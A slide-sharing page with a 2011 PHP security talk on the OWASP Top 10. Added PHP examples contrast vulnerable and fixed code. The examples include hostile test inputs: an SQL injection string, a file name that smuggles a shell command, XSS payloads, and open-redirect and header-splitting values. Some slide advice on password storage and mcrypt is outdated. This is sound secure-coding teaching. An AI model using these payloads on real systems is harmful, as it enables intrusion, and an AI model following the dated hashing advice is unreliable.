Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance Audit
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdf
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog Presentation
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 

PHP Security Tips

  • 1. PHP Security. E-mail: chris@ctankersley.com; Twitter: @dragonmantank; Identi.ca: dragonmantank. September 20, 2011 NWO-PUG 1
  • 2. Who are you and why are you in my house? Chris Tankersley. Doing PHP for 8 years. Lots of projects no one uses, and a few that some do. TL;DR: https://github.com/dragonmantank
  • 3. The Parts of Security: It’s more than just a username/password.
  • 4. What is Secure Programming? Minimizing Attack Surface; Establishing Secure Defaults; Principle of Least Privilege; Defense in Depth; Fail Securely; Don’t Trust Services or Users; Separation of Duties; Avoid Security through Obscurity; Keep Security Simple; Fix Security Issues Correctly. (https://www.owasp.org/index.php/Secure_Coding_Principles)
  • 5. Most Common Attacks: And how to avoid them.
  • 6. OWASP Top 10: Injection; Cross-Site Scripting; Broken Authentication and Session Management; Insecure Direct Object References; Cross-Site Request Forgery; Security Misconfiguration; Insecure Cryptographic Storage; Failure To Restrict URL Access; Insufficient Transport Layer Protection; Unvalidated Redirects and Forwards. (https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project)
  • 7. Injection
  • 8. What is Injection? When a user or service corrupts a command due to improper validation of input.
  • 9. Many Shapes and Sizes: SQL Injection; Command Injection; HTML Injection.
  • 10. Protecting against Injection Attacks: Filter user input; escape anything not hard-coded; ignore $_REQUEST.
  • 11. SQL Injection
  • 12. A Bit More Real Life
  • 13. Protecting against SQL Injection: Use PDO and prepared statements.
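Added example (not the deck's own code): the string-concatenated query beside the PDO prepared statement slide 13 recommends, run against an in-memory SQLite table with constructed rows so it works offline (PHP 7+ assumed).

```php
<?php
// Added example, not from the slides: vulnerable concatenation vs. PDO prepared statement.
declare(strict_types=1);

function makeDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Constructed sample data standing in for a real users table.
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)');
    $db->exec("INSERT INTO users (name, role) VALUES ('alice', 'admin'), ('bob', 'user')");
    return $db;
}

// Vulnerable: the input becomes part of the SQL text, so it can change the query's meaning.
function findUserVulnerable(PDO $db, string $name): array
{
    $sql = "SELECT name, role FROM users WHERE name = '" . $name . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: the SQL text is frozen at prepare time; the input travels separately as a bound value.
function findUserSafe(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT name, role FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = makeDb();
// Constructed input of the kind a login or search field receives.
$hostile = "' OR '1'='1";

// The concatenated query now reads: WHERE name = '' OR '1'='1', which is true for every row.
echo 'vulnerable rows: ', count(findUserVulnerable($db, $hostile)), PHP_EOL;
// The prepared query looks for a user literally named "' OR '1'='1" and finds nobody.
echo 'prepared rows:   ', count(findUserSafe($db, $hostile)), PHP_EOL;
```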
  • 14. Command Injection: When your script calls an external program, users can run code.
  • 15. Protecting against Command Injection: If allowing the user to specify commands, use escapeshellcmd(); if allowing the user to specify arguments, use escapeshellarg().
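Added example (not the deck's own code): building a command line from a user-supplied file name with escapeshellarg() as slide 15 advises, plus an allow-list and a hard-coded program name as defense in depth. UPLOAD_DIR is a hypothetical path and ImageMagick's convert is assumed to be the external program.

```php
<?php
// Added example, not from the slides: user input only ever becomes a quoted argument.
declare(strict_types=1);

const UPLOAD_DIR = '/var/app/uploads';   // hypothetical

/**
 * Return the shell command that would make a thumbnail of one upload, or null
 * if the name is refused. Only the string is built here; nothing is executed.
 */
function buildThumbnailCommand(string $userFile): ?string
{
    // 1. Allow-list the shape of the name before it gets anywhere near a shell.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\.(png|jpg)\z/', $userFile) !== 1) {
        return null;
    }
    // 2. Escape anyway: escapeshellarg() wraps the value in single quotes and
    //    neutralises embedded quotes, so the whole value stays one argument.
    $src = escapeshellarg(UPLOAD_DIR . '/' . $userFile);
    $dst = escapeshellarg(UPLOAD_DIR . '/thumbs/' . $userFile);
    // 3. The program and its options are hard-coded, never taken from the request.
    return 'convert ' . $src . ' -resize 128x128 ' . $dst;
}

// Constructed inputs: one acceptable, two that would try to break out of the argument.
$inputs = [
    'cat.png',
    'cat.png; id',
    "it's.png",
];
foreach ($inputs as $in) {
    $cmd = buildThumbnailCommand($in);
    echo str_pad($in, 16) . ' => ' . ($cmd ?? 'refused') . PHP_EOL;
}

// What escapeshellarg() alone does with a value containing a quote: the quote is
// escaped and the result is still a single, harmless argument.
echo escapeshellarg("it's.png"), PHP_EOL;
```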
  • 16. HTML/Script Injection. HTML Injection: when user input is used to create new markup that the application did not expect. Script Injection: when user input is used to add new scripting to a page.
  • 17. HTML/Script Injection
  • 18. Protecting against HTML/Script Injection: Decide if you really need to take HTML input. If you do: use an HTML cleaner like Tidy or htmLawed, and create a whitelist of allowed tags. If you don’t: use htmlentities()/htmlspecialchars().
  • 19. Cross Site Scripting, or XSS
  • 20. What is it? When a user injects a script into a page or extra JS into a command to send information to another site.
  • 21. How to avoid XSS? Since this is an injection attack, use the same steps as for HTML/Script injection.
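Added example (not the deck's own code) covering slides 18 and 21: the "you don't need HTML input" path, encoding untrusted values with htmlspecialchars() in an element body and an attribute, and allow-listing the scheme of a user-supplied link, which escaping alone does not cover. The renderComment() function and its inputs are constructed for this illustration.

```php
<?php
// Added example, not from the slides: output encoding for text, attributes and links.
declare(strict_types=1);

/** Escape for HTML text and for double- or single-quoted attribute values. */
function e(string $value): string
{
    // ENT_QUOTES escapes both quote styles so a value cannot close an attribute;
    // the explicit UTF-8 charset avoids charset mix-ups in the encoder.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Render a comment card. Every interpolated value passes through an encoder. */
function renderComment(string $author, string $body, string $profileUrl): string
{
    // A javascript: URL survives htmlspecialchars() untouched, so the scheme is
    // allow-listed separately and anything else falls back to a harmless "#".
    $safeUrl = preg_match('#\Ahttps?://#i', $profileUrl) === 1 ? e($profileUrl) : '#';

    return '<div class="comment" data-author="' . e($author) . '">'
         . '<a href="' . $safeUrl . '">' . e($author) . '</a>: '
         . e($body)
         . '</div>';
}

// Constructed untrusted input, the kind a comment form receives.
$author = 'mallory" onmouseover="alert(1)';
$body   = '<script>alert("xss")</script>';
$url    = 'javascript:alert(1)';

// The data-author attribute stays closed, the <script> tag is rendered as literal
// text, and the link degrades to "#" because its scheme was not allowed.
echo renderComment($author, $body, $url), PHP_EOL;
```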
  • 22. Broken Authentication and Session Management
  • 23. What is it? Insecure storing of credentials; session IDs exposed via URL; session fixation attacks.
  • 24. Storing Credentials: Hash with a salt using the hash() command. Do not use md5 or sha1, use at least sha256; md5 and sha1 are broken and not recommended for secure hashing. If you have to use the raw data, encrypt using mcrypt(). Use AES256 (RIJNDAEL 256).
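Added example (not the deck's own code): salted sha256 via hash() as slide 24 describes, beside password_hash()/password_verify(), the API added in PHP 5.5 that handles the salt and a deliberately slow algorithm for you and is the one to reach for today. Assumes PHP 7.1+ (random_bytes, short list syntax).

```php
<?php
// Added example, not from the slides: per-user salt + sha256, and the modern replacement.
declare(strict_types=1);

/** Slide-24 style: random per-user salt, sha256, stored as "salt$hash". */
function legacyHash(string $password): string
{
    $salt = bin2hex(random_bytes(16));   // 128-bit CSPRNG salt, fresh for every user
    return $salt . '$' . hash('sha256', $salt . $password);
}

function legacyVerify(string $password, string $stored): bool
{
    [$salt, $hash] = explode('$', $stored, 2);
    // hash_equals() compares in constant time, so timing does not leak how close a guess was.
    return hash_equals($hash, hash('sha256', $salt . $password));
}

/** Preferred today: bcrypt via password_hash(); salt and cost are embedded in the result. */
function modernHash(string $password): string
{
    return password_hash($password, PASSWORD_BCRYPT, ['cost' => 12]);
}

function modernVerify(string $password, string $stored): bool
{
    return password_verify($password, $stored);
}

// Constructed demo password.
$pw = 'correct horse battery staple';
$legacy = legacyHash($pw);
$modern = modernHash($pw);

// Hashing the same password twice gives different strings: each call drew a new salt,
// so two users with the same password no longer share a hash (the unsalted-md5 problem).
var_dump($legacy !== legacyHash($pw));
var_dump($modern !== modernHash($pw));

// Verification succeeds only for the original password.
var_dump(legacyVerify($pw, $legacy), legacyVerify('wrong', $legacy));
var_dump(modernVerify($pw, $modern), modernVerify('wrong', $modern));
```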
  • 25. Session IDs in URL: Commonly used when cookies can’t be enabled. Make sure the following is set in your php.ini: session.use_trans_sid = 0 and session.use_only_cookies = 1.
  • 26. Session Fixation: What happens if your users don’t log out? Use sessions to detect login status.
  • 27. Insecure Direct Object References
  • 28. What is it? Making sure that the user actually has access to what they are accessing. Should be handled by checking authorization when the object is accessed, or by mapping. This is not an injection attack, but a logic attack.
  • 29. An Example
  • 30. How to Avoid: Always check to make sure the user has authorization to access the resource. Map variables/whitelist to make it harder.
  • 31. Cross Site Request Forgery, or CSRF Attacks
  • 32. What is it? When unauthorized commands are sent to and from a trusted website. In days gone by, this would be done with referrer checking, but don’t trust referrer information.
  • 33. An example – Bank Transfer: A bank transfer is done via $_GET variables. User is authenticated but not logged out.
  • 34. How to avoid this: Include a hidden element in the form with a one-time value.
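Added example (not the deck's own code): the hidden one-time form value slide 34 recommends, for the slide 33 transfer form. The session is passed in as an array so the functions can be exercised from the CLI; in a real request you would pass $_SESSION after session_start(). Function names and the 'transfer' form id are constructed for this illustration.

```php
<?php
// Added example, not from the slides: mint, embed and consume a per-form CSRF token.
declare(strict_types=1);

/** Mint a token, remember it in the session, return the hidden input markup. */
function csrfField(array &$session, string $formId): string
{
    $token = bin2hex(random_bytes(32));      // 256 bits from the CSPRNG
    $session['csrf'][$formId] = $token;      // one live token per form
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars($token, ENT_QUOTES, 'UTF-8') . '">';
}

/** Check the submitted token, then burn it so the same value cannot be replayed. */
function csrfCheck(array &$session, string $formId, array $post): bool
{
    $expected = $session['csrf'][$formId] ?? null;
    unset($session['csrf'][$formId]);        // one-time: consumed on the first check
    $submitted = $post['csrf_token'] ?? null;
    if ($expected === null || !is_string($submitted)) {
        return false;
    }
    // Constant-time comparison so a guess cannot be refined byte by byte.
    return hash_equals($expected, $submitted);
}

// Constructed walk-through; $session stands in for $_SESSION.
$session = [];
$field = csrfField($session, 'transfer');
preg_match('/value="([0-9a-f]+)"/', $field, $m);   // what the browser would echo back
$token = $m[1];

// 1. Legitimate submission from the page that rendered the field: accepted.
var_dump(csrfCheck($session, 'transfer', ['amount' => '10', 'csrf_token' => $token]));

// 2. Replay of the same token: refused, it was consumed above.
var_dump(csrfCheck($session, 'transfer', ['amount' => '10', 'csrf_token' => $token]));

// 3. A forged cross-site request cannot read the victim's session, so it arrives
//    without the token even though the cookie is sent along: refused.
csrfField($session, 'transfer');
var_dump(csrfCheck($session, 'transfer', ['amount' => '1000']));
```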
  • 35. Security Misconfiguration
  • 36. Beyond the scope of programming: Check for server hardening guidelines for your OS; password rotation practices; understanding your settings; keep your stack up to date!
  • 37. Insecure Cryptographic Storage
  • 38. More of a logic problem: Encrypting data in the database, but leaving it unencrypted during output; using unsalted hashes.
  • 39. How to avoid this: Like when storing credentials, use a salt whenever hashing information. Only decrypt data when it is needed.
  • 40. Failure to Restrict URL Access
  • 41. What is it? When users can gain access to parts of the application just through URL manipulation; when the app doesn’t check authorization properly.
  • 42. Security through Obscurity: Don’t trust that just because a user doesn’t know a URL, they can’t get to it. Fuzzers can find all kinds of things, especially if the app is common.
  • 43. How to avoid this: ALWAYS check authorization. The extra CPU cycles are worth it.
  • 44. Insufficient Transport Layer Protection
  • 45. Not using SSL when you should: If your data is sensitive, use SSL. Are your logins behind SSL? There isn’t really an excuse. You can get an SSL cert for $9/year.
  • 46. Unvalidated Redirects and Forwards
  • 47. What is it? When an app doesn’t properly validate that the redirect destination is valid.
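Added example (not the deck's own code): validating a user-supplied "return to" destination before issuing the redirect, the check slide 47 says is missing when this flaw is present. OWN_HOST is a hypothetical value; substitute your application's own host.

```php
<?php
// Added example, not from the slides: accept only local paths or https URLs on our own host.
declare(strict_types=1);

const OWN_HOST = 'www.example.com';   // hypothetical

/**
 * Return a safe redirect target, falling back to "/" for anything that is not
 * a same-site path or an https URL on OWN_HOST.
 */
function safeRedirect(string $target): string
{
    // Control characters or a backslash can smuggle a different URL past the
    // checks below (header splitting, browsers treating "\" as "/").
    if (preg_match('/[\x00-\x1f\x7f\\\\]/', $target) === 1) {
        return '/';
    }
    // Same-site relative path: a single leading "/" that is not "//host/...".
    if (preg_match('#\A/(?![/\\\\])#', $target) === 1) {
        return $target;
    }
    $parts = parse_url($target);
    if ($parts === false) {
        return '/';
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    $host   = strtolower($parts['host'] ?? '');
    if ($scheme === 'https' && $host === OWN_HOST) {
        return $target;
    }
    return '/';   // other hosts, protocol-relative, javascript:, data:, garbage
}

// Constructed inputs covering the accepted forms and the usual bypass attempts.
$cases = [
    '/account/settings',
    'https://www.example.com/orders',
    '//evil.example/phish',
    'https://evil.example/login',
    'javascript:alert(1)',
    "/ok\r\nSet-Cookie: x=1",
];
foreach ($cases as $c) {
    echo str_pad(json_encode($c), 40) . ' -> ' . safeRedirect($c) . PHP_EOL;
}
```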
  • 48. Putting it Together
  • 49. Attacking from Multiple Fronts: Attackers will employ many different vectors in an attack. HTML injection can take advantage of a broken auth system and use XSS or URL restrictions to force users to do unintended actions. Script injection can lead to session hijacking.
  • 50. Remember… Minimizing Attack Surface; Establishing Secure Defaults; Principle of Least Privilege; Defense in Depth; Fail Securely; Don’t Trust Services or Users; Separation of Duties; Avoid Security through Obscurity; Keep Security Simple; Fix Security Issues Correctly. (https://www.owasp.org/index.php/Secure_Coding_Principles)
  • 51. Questions?